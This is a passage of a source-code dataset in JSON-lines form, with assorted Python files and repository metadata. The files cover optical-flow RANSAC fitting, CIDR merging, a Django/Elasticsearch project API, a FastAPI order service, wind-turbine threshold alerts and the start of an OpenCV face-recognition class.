np.asarray(flow_none_zeros)\n length = flow_none_zeros.shape[0]\n if length%2 != 0:\n length = length - 1\n flow_left = flow_none_zeros[0:int(length/2), :]\n flow_left = np.divide(flow_left, np.reshape(np.linalg.norm(flow_left, axis=-1), (int(length/2), 1)))\n flow_right = flow_none_zeros[int(length/2):length, :]\n flow_right = np.divide(flow_right, np.reshape(np.linalg.norm(flow_right, axis=-1), (int(length/2), 1)))\n\n check_parallel = (np.abs(np.cross(flow_left, flow_right)) > 0.1).sum() / int(length/2)\n\n img_u = np.zeros((height, width))\n img_v = np.zeros((height, width))\n for v in range(height):\n img_v[v, :] = v\n for u in range(width):\n img_u[:, u] = u\n if check_parallel > 1.0:\n print(\"Percentage:\" + str(check_parallel) + \" Estimating rotation midpoint\")\n img_v_flat = np.asarray(img_v.flatten())\n img_u_flat = np.asarray(img_u.flatten())\n Y = []\n img_VU = []\n for idx, val in enumerate(mask):\n if val:\n Y.append(flow_v_array[idx] * img_v_flat[idx] + flow_u_array[idx] * img_u_flat[idx])\n img_VU.append([img_v_flat[idx], img_u_flat[idx]])\n center = center_ransac(flow_none_zeros, Y, img_VU)\n print(center)\n else:\n center = [height, width / 2.0]\n\n img_v = center[0] - img_v\n img_u = img_u - center[1]\n return img_v.flatten(), img_u.flatten(), center\n\n\ndef ransac(X, Y, sample_size=10, max_iterations=100, stop_at_goal=True, random_seed=None):\n n = X.shape[1]\n print(\"Number of points: \", n)\n goal_inliers = n * 0.7\n\n best_ic = 0\n best_model = None\n\n data = np.concatenate([X, Y], axis=0)\n data = data.T\n random.seed(random_seed)\n\n # random.sample cannot deal with \"data\" being a numpy array\n data = list(data)\n for i in range(max_iterations):\n s = random.sample(data, int(sample_size))\n s = np.asarray(s)\n array_1 = np.transpose(s[:, :3])\n array_2 = np.transpose(s[:, 3:])\n\n R, c, t = _ralign(array_1, array_2)\n ic = count_inlier(R, c, t*10, X, Y)\n\n if ic > best_ic:\n best_ic = ic\n best_model = [R, c, t]\n if ic > goal_inliers and stop_at_goal:\n break\n\n return best_model\n\n\ndef count_inlier(R, c, t, array_1, array_2):\n transformed_img = np.add(np.dot(c * R, array_1), np.reshape(t, (3, 1)))\n err = np.sum(np.square(np.subtract(transformed_img, array_2)), axis=0)\n ic = len(np.where(err < 10)[0])\n return ic\n\n\ndef center_ransac(X, Y, img_VU, sample_size=50, max_iterations=100, stop_at_goal=True, random_seed=None):\n n = X.shape[0]\n print(\"Number of points: \", n)\n goal_inliers = n * 0.7\n\n best_ic = 0\n best_model = None\n\n Y = np.reshape(Y, (n, 1))\n data = np.concatenate([X, Y], axis=1)\n random.seed(random_seed)\n\n # random.sample cannot deal with \"data\" being a numpy array\n data = list(data)\n for i in range(max_iterations):\n s = random.sample(data, int(sample_size))\n s = np.asarray(s)\n array_1 = s[:, :2]\n array_2 = s[:, 2:]\n\n array_1_T = np.transpose(array_1)\n center = np.dot(np.dot(np.linalg.inv(np.dot(array_1_T, array_1)), array_1_T), array_2)\n ic = count_center_inlier(center, X, img_VU)\n\n if ic > best_ic:\n best_ic = ic\n best_model = center\n if ic > goal_inliers and stop_at_goal:\n break\n return best_model\n\n\ndef count_center_inlier(center, X, img_VU):\n normal_vector = np.subtract(img_VU, np.transpose(center))\n normal_vector = np.reshape(normal_vector, (normal_vector.shape[0], 1, 2))\n X = np.reshape(X, (X.shape[0], 2, 1))\n err = np.reshape(np.einsum('ipq,iqr->ipr', normal_vector, X), (X.shape[0]))\n ic = len(np.where(np.abs(err) < 10))\n print(ic)\n return ic","repo_name":"zhangqiuhao/Unsupervised_flow","sub_path":"Unflow/src/evaluation_funtion.py","file_name":"evaluation_funtion.py","file_ext":"py","file_size_in_byte":10861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14877065155","text":"import argparse\n\nimport netaddr\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Merge IP addresses into the smallest possible list of CIDRs.')\n parser.add_argument('--source', nargs='?', type=argparse.FileType('r'), required=True, help='Source file path')\n args = parser.parse_args()\n\n for addr in netaddr.cidr_merge(args.source.readlines()):\n print(addr)\n","repo_name":"lord-alfred/ipranges","sub_path":"utils/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":298,"dataset":"github-code","pt":"53"} +{"seq_id":"22382202772","text":"from os import system\nfrom time import sleep\nfrom classes import *\n\n\"\"\"\nAssociação: Fazer classes conversar com outras\n\"\"\"\n\nif __name__ == \"__main__\":\n system(\"cls\")\n\n def linha():\n print(\"-=\" * 20)\n\n linha()\n print(\"Associação\".center(40))\n linha()\n\n escritor = Escritor(\"Rodrigo\")\n caneta = Caneta(\"BIC\")\n maquina = MaquinaDeEscrever()\n\n escritor.ferramenta = caneta\n escritor.ferramenta.escrever()\n\n # opcoes = [\"Caneta\", \"Máquina de Escrever\"]\n # while True:\n # system(\"cls\")\n # linha()\n # for index, opcao in enumerate(opcoes):\n # print(index+1, opcao)\n # linha()\n \n # ferramenta_a_ser_usada = int(input(\"Qual ferramenta você deseja usar? \"))-1\n\n # escritor.ferramenta = caneta if ferramenta_a_ser_usada == 0 else maquina\n # escritor.usar_ferramenta()\n # sleep(1)\n","repo_name":"rodrigobarbonifilho/Python","sub_path":"Python POO/Otávio Miranda/Aula 07/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32336658162","text":"import sys\r\nsys.setrecursionlimit(10**6)\r\n\r\ndef solution(li, x, y):\r\n dx = [-1, -1, -1, 0, 0, 0, 1, 1, 1]\r\n dy = [-1, 0, 1, -1, 0, 1, -1, 0, 1]\r\n\r\n for i in range(9):\r\n mx = x + dx[i]\r\n my = y + dy[i]\r\n if 0 <= mx < h and 0 <= my < w:\r\n if li[mx][my] == 1:\r\n li[mx][my] = 0\r\n solution(li, mx, my)\r\n\r\n\r\nwhile 1:\r\n w, h = map(int, input().split())\r\n if w == h == 0:\r\n break\r\n arr = [list(map(int, input().split())) for _ in range(h)]\r\n cnt = 0\r\n for i in range(h):\r\n for j in range(w):\r\n if arr[i][j] == 1:\r\n cnt += 1\r\n solution(arr, i, j)\r\n\r\n print(cnt)","repo_name":"KHyeon9/Algorithm_Python","sub_path":"BOJ/Silver/4963.py","file_name":"4963.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11040102955","text":"import tkinter as tk\nimport execute_api.list_class as lc\nimport execute_api.list_attendance as la\nimport execute_api.get_student_info as gsti\nimport cv2\nimport numpy as np\nimport os\nfrom PIL import Image\nimport execute_api.refresh as rf\nSAVE_FOLDER = os.path.join(os.path.abspath(\n os.path.dirname(os.path.dirname(__file__))), 'hello_n/static/files')\n\n\ndef get_profile(access_token, student_id):\n try:\n response = gsti.get_student_info(access_token, student_id)\n if response['status'] == 200:\n email = response['data']['email']\n id = response['data']['id']\n name = response['data']['name']\n student_id = response['data']['student_id']\n return id, name, student_id, email\n else:\n return None, None, None, None\n except:\n return None, None, None, None\n\n\nclass DetailClassPage(tk.Frame):\n\n def __init__(self, parent, controller, at=None, rt=None, datas=[]):\n tk.Frame.__init__(self, parent)\n self.container = parent\n self.controller = controller\n self.at = at\n self.rt = rt\n self.datas = datas\n self.class_id = datas[0]['class_id']\n self.class_datas = []\n self.init_UI()\n self.draw_table()\n\n self.oid = ''\n self.email = ''\n self.student_id = ''\n self.name = ''\n\n def init_UI(self):\n self.label_date = tk.Label(self, text=\"Date\")\n self.entry_date = tk.Entry(self, width=20, bg=\"light yellow\")\n self.label_notice = tk.Label(self, text=\"\", bg=\"orange\")\n\n button_home = tk.Button(\n self, text=\"BACK\", command=lambda: self.controller.show_frame(self.container, \"ClassPage\", self.at, self.rt))\n button_home.configure(width=10, bg=\"orange\")\n\n button_all = tk.Button(\n self, text=\"ALL\", command=self.list_attendance_all)\n button_all.configure(width=10, bg=\"lightblue\")\n\n button_absent = tk.Button(\n self, text=\"ABSENT\", command=self.list_attendance_absent)\n button_absent.configure(width=10, bg=\"lightblue\")\n\n button_attendance = tk.Button(\n self, text=\"PRESENT\", command=self.list_attendance_attendance)\n button_attendance.configure(width=10, bg=\"lightblue\")\n\n button_add_student = tk.Button(\n self, text=\"ADD STUDENT\", command=lambda: self.controller.show_frame(\n self.container,\n \"AddStudentClassPage\",\n self.at,\n self.rt,\n [{\"class_id\": self.class_id}]\n )\n )\n button_add_student.configure(width=10, bg=\"orange\")\n\n button_take_attendance = tk.Button(\n self, text=\"TAKE ATTENDANCE\", command=self.take_attendance)\n button_take_attendance.configure(width=10, bg=\"orange\")\n\n # button_home.pack()\n # button_all.pack()\n # button_absent.pack()\n # button_attendance.pack()\n # self.label_date.pack()\n # self.entry_date.pack()\n # self.label_notice.pack()\n\n button_home.grid(row=0, column=0, sticky=tk.NSEW)\n button_take_attendance.grid(row=0, column=1, sticky=tk.NSEW)\n button_add_student.grid(row=0, column=2, sticky=tk.NSEW)\n button_all.grid(row=1, column=0, sticky=tk.NSEW)\n button_absent.grid(row=1, column=1, sticky=tk.NSEW)\n button_attendance.grid(row=1, column=2, sticky=tk.NSEW)\n self.label_date.grid(row=4, column=1, sticky=tk.NSEW)\n self.entry_date.grid(row=5, column=1, sticky=tk.NSEW)\n self.label_notice.grid(row=6, column=1)\n\n def list_attendance_all(self):\n self.check_current_token()\n\n self.label_notice['text'] = \"\"\n # check date\n state = \"all\"\n date = self.entry_date.get()\n if not date and state != \"all\":\n self.label_notice['text'] = \"Please enter date\"\n return\n date = date+\"T00:00:00.00000\"\n try:\n response = la.exec_list_attendance(\n self.at, self.class_id, state, date)\n if response['status'] == 200:\n # tao bang\n # print(response['data'])\n self.del_table()\n self.class_datas = response['data']\n print(self.class_datas)\n self.draw_table()\n except:\n pass\n\n def list_attendance_absent(self):\n self.check_current_token()\n\n self.label_notice['text'] = \"\"\n # check date\n state = \"absent\"\n date = self.entry_date.get()\n if not date:\n self.label_notice['text'] = \"Please enter date\"\n return\n date = date+\"T00:00:00.00000\"\n try:\n response = la.exec_list_attendance(\n self.at, self.class_id, state, date)\n if response['status'] == 200:\n # tao bang\n # print(response['data'])\n self.del_table()\n self.class_datas = response['data']\n print(self.class_datas)\n self.draw_table()\n except:\n pass\n\n def list_attendance_attendance(self):\n self.check_current_token()\n\n self.label_notice['text'] = \"\"\n # check date\n state = \"attendance\"\n date = self.entry_date.get()\n if not date:\n self.label_notice['text'] = \"Please enter date\"\n return\n date = date+\"T00:00:00.00000\"\n try:\n response = la.exec_list_attendance(\n self.at, self.class_id, state, date)\n if response['status'] == 200:\n # tao bang\n # print(response['data'])\n self.del_table()\n self.class_datas = response['data']\n print(self.class_datas)\n self.draw_table()\n except:\n pass\n\n def del_table(self):\n\n datas = self.class_datas\n height = len(datas)\n width = 3\n for i in range(8, 8+height): # Rows\n for j in range(width): # Columns\n self.nametowidget(str(i-8)+\"-\"+str(j)).destroy()\n\n def draw_table(self):\n self.check_current_token()\n\n columns = [\"Email\", \"Name\", \"Student Id\"]\n for i in range(len(columns)):\n b = tk.Entry(self, width=44, bg='LightSteelBlue', fg='Black',\n font=('Arial', 16, 'bold'))\n b.grid(row=7, column=i)\n b.insert(tk.END, columns[i])\n datas = self.class_datas\n height = len(datas)\n width = 3\n for i in range(8, 8+height): # Rows\n for j in range(width): # Columns\n b = tk.Entry(self, text=\"\", name=str(i-8)+\"-\"+str(j), width=44, bg='White', fg='Black',\n font=('Arial', 16))\n b.grid(row=i, column=j)\n if j == 0:\n b.insert(tk.END, datas[i-8]['email'])\n elif j == 1:\n b.insert(tk.END, datas[i-8]['name'])\n elif j == 2:\n b.insert(tk.END, datas[i-8]['student_id'])\n\n def take_attendance(self):\n \n face_cascade = cv2.CascadeClassifier(\n cv2.data.haarcascades + \"haarcascade_frontalface_default.xml\")\n recognizer = cv2.face.LBPHFaceRecognizer_create()\n recognizer.read(SAVE_FOLDER+'/me.yml')\n cap = cv2.VideoCapture(0)\n fontface = cv2.FONT_HERSHEY_SIMPLEX\n while True:\n ret, frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray)\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 225, 0), 2)\n roi_gray = gray[y:y+h, x:x+w]\n student_id, confidence = recognizer.predict(roi_gray)\n if confidence < 40:\n id, name, student_id, email = get_profile(self.at,student_id)\n self.oid = id\n self.email = email\n self.student_id = student_id\n self.name = name\n if id and name and email and student_id:\n cv2.putText(frame, name, (x+10, y+h+30),\n fontface, 1, (0, 255, 0), 2)\n cv2.putText(frame, student_id, (x+10, y+h+60),\n fontface, 1, (0, 255, 0), 2)\n cv2.putText(frame, email, (x+10, y+h+90),\n fontface, 1, (0, 255, 0), 2)\n else:\n cv2.putText(frame, \"Unknown\", (x+10, h+h+30),\n fontface, 1, (0, 0, 225), 2)\n cv2.imshow('DETECTING FACE', frame)\n if cv2.waitKey(1) == ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()\n if self.oid and self.name and self.student_id and self.email:\n self.controller.show_frame(\n self.container,\n \"TakeAttendancePage\",\n self.at,\n self.rt,\n [\n {\n \"class_id\":self.class_id,\n \"student_oid\":self.oid,\n \"name\":self.name,\n \"email\":self.email,\n \"student_id\": self.student_id\n }\n ]\n )\n else:\n return\n def check_current_token(self):\n new_at,new_rt,status= rf.check_token(self.at,self.rt)\n if not new_at and not new_rt and not status:\n pass\n elif new_at and new_rt and not status:\n self.at = new_at\n self.rt = new_rt\n elif not new_at and not new_rt and status=='restart':\n self.controller.show_frame(self.container,\"StartPage\",self.at,self.rt)\n\n","repo_name":"bezleen/attendance-app-client","sub_path":"detail_class_page.py","file_name":"detail_class_page.py","file_ext":"py","file_size_in_byte":9930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73285627689","text":"from fastapi import FastAPI, HTTPException, Depends\nimport models\nimport schemas\nfrom database import engine, SessionLocal\nfrom sqlalchemy.orm import Session\n\napp = FastAPI()\n\nmodels.Base.metadata.create_all(bind = engine)\n\n# Dependency\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n \n#Order Endpoints\n@app.post('/order/')\nasync def create_order(order: schemas.OrderBase, db: Session = Depends(get_db)):\n db_order = models.Order(time_stamp = order.time_stamp)\n db_address = models.Address(city = order.address.city, country = order.address.country, zipcode = order.address.zipcode, order_id = db_order.id)\n db.add(db_address)\n itemids = [i.id for i in db.query(models.Product.id)]\n prodtotal = 0.0 \n print(itemids)\n for item in order.items:\n db_item = models.Items(productid = item.productid, boughtqty = item.boughtqty, order_id = db_order.id)\n if db_item.productid not in itemids:\n raise HTTPException(status_code = 404, detail = \"Item of given ID not in Products!\")\n val = db.query(models.Product).filter(models.Product.id == db_item.productid).first()\n if db_item.boughtqty > val.quantity:\n raise HTTPException(status_code = 400, detail = \"Number of products exceeds stock!\")\n prodtotal += val.price * db_item.boughtqty\n print(prodtotal)\n db.add(db_item)\n db_order.total = prodtotal\n db.add(db_order)\n db.commit()\n\n\n@app.get('/order/')\nasync def get_all_orders(db: Session = Depends(get_db), skip: int = 0, limit: int = 5):\n result = db.query(models.Order).offset(skip).limit(limit).all()\n if not result:\n raise HTTPException(status_code = 404, detail = \"No Orders in system!\")\n return result\n\n@app.get('/order/{order_id}')\nasync def get_order_by_id(order_id: int, db: Session = Depends(get_db)):\n result = db.query(models.Order).filter(models.Order.id == order_id).first()\n if not result:\n raise HTTPException(status_code = 404, detail = \"Order of given ID not found!\")\n return result\n\n\n#Address Endpoints\n@app.get('/address/{order_id}')\nasync def get_address_by_id(order_id: int, db: Session = Depends(get_db)):\n result = db.query(models.Address).filter(models.Order.id == order_id).first()\n return result\n\n\n#Product Endpoints\n@app.post('/product/')\nasync def create_product(product: schemas.ProductBase, db: Session = Depends(get_db)):\n db_product = models.Product(name = product.name, price = product.price, quantity = product.quantity)\n db.add(db_product)\n db.commit()\n db.refresh(db_product)\n\n@app.get('/product/')\nasync def get_all_products(db: Session = Depends(get_db), skip: int = 0, limit: int = 5):\n result = db.query(models.Product).offset(skip).limit(limit).all()\n if not result:\n raise HTTPException(status_code = 404, detail = \"No Products in system!\")\n return result\n\n@app.put('/product/{product_id}')\nasync def update_product(product_id: int, product: schemas.ProductBase, db: Session = Depends(get_db)):\n result = db.query(models.Product).filter(models.Product.id == product_id).first()\n result.name = product.name\n result.price = product.price\n result.quantity = product.quantity\n db.commit()\n db.refresh(result)\n ","repo_name":"Kausar-De/CosmoCloud-Task-Kausar-De","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6625078536","text":"import pandas as pd\nimport numpy as np\ndef above_threshold(df, column, threshold):\n '''\n Function to check if the given column is above the threshold\n '''\n if df[column].max() > threshold:\n alert_msg = f\"{column} is above the threshold of {threshold}\"\n return alert_msg\n else:\n return None\ndef below_threshold(df, column, threshold):\n '''\n Function to check if the given column is below the threshold\n '''\n if df[column].min() < threshold:\n alert_msg = f\"{column} is below the threshold of {threshold}\"\n return alert_msg\n else:\n return None\ndef continuous_threshold(df, column, threshold, duration):\n '''\n Function to check if the given column is above the threshold continuously for the given duration\n '''\n continuous_count = 0\n for value in df[column]:\n if value > threshold:\n continuous_count += 1\n else:\n continuous_count = 0\n if continuous_count >= duration:\n alert_msg = f\"{column} is continuously above the threshold of {threshold} for {duration} minutes\"\n return alert_msg\n return None\n# Example usage\nwind_turbine_data = pd.DataFrame({'temperature_100': [30, 25, 30],\n 'pressure_100': [2000, 1100, 1200],\n 'wind_speed_100': [30, 15, 20],\n 'power_output_100': [1500, 2000, 2500]})\n# Alert for wind speed above 25 m/s\nalert1 = above_threshold(wind_turbine_data, 'wind_speed_100', 25)\nif alert1:\n print(alert1)\n# Alert for power output below 1000 kW\nalert2 = below_threshold(wind_turbine_data, 'power_output_100', 1000)\nif alert2:\n print(alert2)\n# Alert for wind speed continuously above 20 m/s for 5 minutes\nalert3 = continuous_threshold(wind_turbine_data, 'wind_speed_100', 20, 5)\nif alert3:\n print(alert3)\n","repo_name":"bpbpublications/IoT-Data-Analytics-using-Python","sub_path":"Chapter 08/code/901_8.1.py","file_name":"901_8.1.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32415953986","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseNotAllowed, HttpResponseBadRequest\nimport re\nfrom elasticsearch_dsl.query import MultiMatch, Match\n\nimport os\nimport logging\nimport json\nfrom datetime import datetime, date, time\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch_dsl import Search\n\nclient = Elasticsearch()\n\n# Create your views here.\nlogger = logging.getLogger('restapp')\n\n\ndef createproject(request):\n ''' it handles the json request and save the json file to Project.txt'''\n print(request.content_type)\n if request.content_type == 'application/json':\n logger.info(\"in post method of createproject\")\n try:\n data = json.loads(request.body.decode(\"utf-8\"))\n except ValueError:\n logger.info(\"invalid request. bad json sent\")\n return HttpResponseBadRequest('invalid request.. ')\n\n id = data['id']\n try:\n id = int(id)\n except ValueError:\n logger.info(\"invalid request. project id should be of type int\")\n return HttpResponseBadRequest('invalid request')\n projectName = data['projectName']\n projectCost = data['projectCost']\n projectUrl = data['projectUrl']\n creationDate = data['creationDate']\n\n expiryDate = data['expiryDate ']\n targetCountries = data['targetCountries']\n targetKeys = data['targetKeys']\n for target in targetKeys:\n try:\n int(target['number'])\n except ValueError:\n logger.info(\"invalid request. project id should be of type int\")\n return HttpResponseBadRequest('invalid request')\n logger.info(\"Complete ->checking parameter\")\n pwd = os.path.dirname(__file__)\n with open(pwd + '/Project.txt', 'a') as data_file: # appending data to the file\n data_file.write(json.dumps(data))\n data_file.write(\"\\n\")\n results.append(data)\n logger.info(\"Complete -> Writing value to file\")\n\n logger.info(\"campaign is successfully created\")\n\n return HttpResponse(\"campaign is successfully created\")\n else:\n if request.GET:\n logger.info(\"invalid request. using get type\")\n else:\n if request.content_type != 'application/json':\n logger.info(\"invalid request. request.content type is not json\")\n\n return HttpResponseNotAllowed('Only POST method with content-type json allowed here')\n\n\ndef requestproject(request):\n ''' sends the project based on the parameter it receives'''\n logger.info(\"inside requestproject\")\n documentAddFromFile()\n if len(request.GET) == 0:\n s = Search(using=client, index=\"restapp\").sort('-projectCost')\n response = s.execute()\n return elasticResponseGeneratePrintOne(response)\n\n if True:\n for k, v in request.GET.items():\n print (k)\n print (v)\n s = Search(using=client, index=\"restapp\")\n if k == 'id':\n\n s = s.filter(\"term\", id=v)\n response = s.execute()\n return elasticResponseGenerate(response)\n elif k == 'country':\n s = s.query(\"match\", targetCountries=v)\n response = s.execute()\n return elasticResponseGenerate(response)\n elif k == 'number':\n args = {\n \"targetKeys.number\": v\n }\n s.filter(\"term\", **args)\n response = s.execute()\n return elasticResponseGenerate(response)\n\n return HttpResponse(\"no project found\")\n\n\ndef documentAddFromFile():\n resultList = []\n pwd = os.path.dirname(__file__)\n with open(pwd + '/Project.txt', 'r') as data_file:\n logger.info(\"Complete -> Writing value to file\")\n # client.bulk(index='restapp', body = data_file, refresh = True)\n for line in data_file:\n # client.index(index='restapp', doc_type= 'project', body = line)\n record = json.loads(line)\n resultList.append(record)\n return resultList\n\n\ndef elasticResponseGenerate(response):\n ''' sends the response generated from the elastic search'''\n\n if response['hits']['total'] > 0:\n records = (response['hits']['hits'])\n print(len(records))\n res = ''\n\n for d in records:\n print(d['_source']['expiryDate '])\n print(d['_source'].to_dict())\n currentdate = datetime.now()\n dateofrecord = datetime.strptime(d['_source']['expiryDate '], \"%m%d%Y %H:%M:%S\")\n\n if len((d['_source']['projectUrl']).strip()) == 0:\n continue;\n if dateofrecord < currentdate:\n continue;\n res = res + json.dumps(d['_source'].to_dict(), indent=7) + '\\n'\n\n if len(res.strip()) == 0:\n return HttpResponse(\"no project found\")\n\n return HttpResponse(res, content_type=\"application/json\")\n\n else:\n return HttpResponse(\"no project found\")\n\n\ndef elasticResponseGeneratePrintOne(response):\n if response['hits']['total'] > 0:\n d = (response['hits']['hits'][0]['_source'])\n currentdate = datetime.now()\n dateofrecord = datetime.strptime(d['expiryDate '], \"%m%d%Y %H:%M:%S\")\n if len((d['projectUrl']).strip()) == 0:\n return HttpResponse(\"no project found\")\n if dateofrecord < currentdate:\n return HttpResponse(\"no project found\")\n return HttpResponse(json.dumps(d.to_dict(), indent=7), content_type=\"application/json\")\n else:\n return HttpResponse(\"no project found\")\n\n\ndef getproject(request):\n ''' implementation using regular datastructure'''\n list = results\n print(\"------------\")\n print(len(list))\n\n if len(request.GET) == 0: # when no parameters are passed then return the project with highest cost\n map = {}\n logger.info(\"request with no parameter.\")\n\n max = 0\n temp = {}\n for l in list:\n if l['projectCost'] > max:\n temp = l\n\n return HttpResponse(json.dumps(temp, indent=7), content_type=\"application/json\")\n\n if 'id' in request.GET: # if id is included then just find the corresponding id and return it\n for l in list:\n val = int(l['id'])\n logger.info(\"request with id parameter.\")\n\n parameterid = int(request.GET['id'])\n if val == parameterid:\n return HttpResponse(json.dumps(l, indent=7), content_type=\"application/json\")\n\n return HttpResponse(\"no project found\")\n\n res = ''\n for l in list: # if id is not present then find the project based on all the parameters passed\n count = 0\n if 'country' in request.GET:\n if request.GET['country'] in l['targetCountries']:\n if checkvalid(l):\n count = count + 1\n if 'number' in request.GET:\n for key in l['targetKeys']:\n if int(key['number']) == int(request.GET['number']):\n if checkvalid(l):\n count = count + 1\n break\n if 'keyword' in request.GET:\n for key in l['targetKeys']:\n if key['keyword'] == request.GET['keyword']:\n if checkvalid(l):\n count = count + 1\n break\n if count == len(request.GET): # checks if the record satisfies all the parameters or not\n res = res + json.dumps(l, indent=7)\n\n if len(res.strip()) != 0:\n return HttpResponse(res, content_type=\"application/json\")\n\n return HttpResponse(\"no project found\")\n\n\ndef checkvalid(l): # utility function that checks expiryDate and projectUrl is valid or not\n currentdate = datetime.now()\n dateofrecord = datetime.strptime(l['expiryDate '], \"%m%d%Y %H:%M:%S\")\n if len((l['projectUrl']).strip()) == 0:\n return False\n if dateofrecord < currentdate:\n return False\n return True\n\n\nresults = documentAddFromFile() # this is executed only once. It reads all the values from the file once .\n","repo_name":"cshekhar1337/unity_tech","sub_path":"restapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22505953568","text":"students = {}\ncounter = {}\nwhile True:\n command = input()\n\n if command == \"exam finished\":\n break\n\n info = command.split(\"-\")\n\n if len(info) == 3:\n name = info[0]\n language = info[1]\n points = int(info[2])\n\n if name not in students.keys():\n students[name] = points\n else:\n if students[name] < points:\n students[name] = points\n\n if language not in counter.keys():\n counter[language] = 0\n counter[language] += 1\n\n elif len(info) == 2:\n name = info[0]\n\n if name in students.keys():\n del students[name]\n\nprint(\"Results:\")\nfor name, points in students.items():\n print(f\"{name} | {points}\")\nprint(\"Submissions:\")\nfor language, points in counter.items():\n print(f\"{language} - {points}\")\n\n\n","repo_name":"BlackRock17/Fundamentals_Python_2023","sub_path":"Dictionary_Exercise/SoftUni_Exam_Result.py","file_name":"SoftUni_Exam_Result.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34655349396","text":"import numpy as np\nimport pandas as pd\nimport joblib\nfrom os.path import join, dirname, realpath\n\nLE_EXERCISEANGINA_PATH = join(dirname(realpath(__file__)), '../models/label_encoder_exerciseangina.joblib')\nLE_SEX_PATH = join(dirname(realpath(__file__)), '../models/label_encoder_sex.joblib')\nOHE_PATH = join(dirname(realpath(__file__)), '../models/one_hot_encoder.joblib')\n\ndef feature_engineering(data):\n data = label_encoding(data)\n data = one_hot_encoding(data)\n\n return data\n\ndef label_encoding(data):\n label_encoder_exerciseangina = joblib.load(LE_EXERCISEANGINA_PATH)\n label_encoder_sex = joblib.load(LE_SEX_PATH)\n\n data['exerciseangina'] = label_encoder_exerciseangina.transform(data['exerciseangina'])\n data['sex'] = label_encoder_sex.transform(data['sex'])\n\n return data\n\ndef one_hot_encoding(data):\n categorical_column_to_one_hot_encode = ['st_slope', 'restingecg', 'chestpaintype']\n\n one_hot_encoder = joblib.load(OHE_PATH)\n\n temp = [\n ['Up', 'ASY', 'LVH']\n ]\n\n # print(data[categorical_column_to_one_hot_encode])\n\n feature_arr = one_hot_encoder.transform(temp).toarray()\n # feature_arr = one_hot_encoder.transform(data[categorical_column_to_one_hot_encode]).toarray()\n feature_labels = one_hot_encoder.categories_\n\n feature_labels = list(np.concatenate(feature_labels))\n\n features = pd.DataFrame(feature_arr, columns=feature_labels)\n\n data.drop(columns=categorical_column_to_one_hot_encode, inplace=True)\n\n data = pd.concat([data, features], axis=1)\n\n return data\n","repo_name":"christhopermarcelino/heart-failure-classification","sub_path":"services/feature_engineering.py","file_name":"feature_engineering.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30552130884","text":"# ------------------------------------------------------------------\n# Warp Sequencer\n# (C) 2020 Michael DeHaan & contributors\n# Apache2 Licensed\n# ------------------------------------------------------------------\n\n# an event represents starting or stopping a note, and some associated\n# data so the program can handle the note and other processing in context.\n# for instance the scale is needed for processing deferred events.\n\nimport copy\n\nfrom .base import BaseObject\n\nNOTE_ON = 1\nNOTE_OFF = 0\n\nclass Event(object):\n\n\n __slots__ = [ 'type', 'note', 'time', 'on_event', 'off_event', 'scale' ]\n\n from . note import Note\n\n def __init__(self, type=None, note=None, time=None, on_event=None, off_event=None, scale=None):\n self.type = type\n self.note = note\n self.time = time\n self.on_event = on_event\n self.off_event = off_event\n self.scale = scale\n\n def __repr__(self):\n return \"Event\" % (self.note, self.type, self.time)\n\n def copy(self):\n return Event(\n type = self.type,\n note = self.note.copy(), # could be a Chord! Be careful.\n time = self.time,\n on_event = self.on_event,\n off_event = self.off_event\n )\n","repo_name":"simianterminal/warpseq","sub_path":"warpseq/model/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"69896009129","text":"from typing import List\n\nfrom src.models.chord import Chord\n\n\ndef extract_chords(song) -> List[Chord]:\n song_chords = []\n\n for chordMeasure in song['ChordsMeasures']:\n for chordData in chordMeasure['Chords']:\n chord = Chord.create_from_json(chordData)\n\n # Group chords that are exactly the same\n if len(song_chords) > 0 and str(chord) == str(song_chords[-1]):\n continue\n\n song_chords.append(chord)\n\n return song_chords","repo_name":"arsenaultk9/chord2vec","sub_path":"src/chords_extractor.py","file_name":"chords_extractor.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33915042500","text":"import cv2 as cv\r\nimport argparse\r\nimport numpy\r\n\r\nclass FaceRecognition():\r\n parser = argparse.ArgumentParser(description='Code for Cascade Classifier tutorial.')\r\n parser.add_argument('--face_cascade', help='Path to face cascade.', default='data/haarcascades/haarcascade_frontalface_alt.xml')\r\n parser.add_argument('--eyes_cascade', help='Path to eyes cascade.', default='data/haarcascades/haarcascade_eye_tree_eyeglasses.xml')\r\n parser.add_argument('--camera', help='Camera 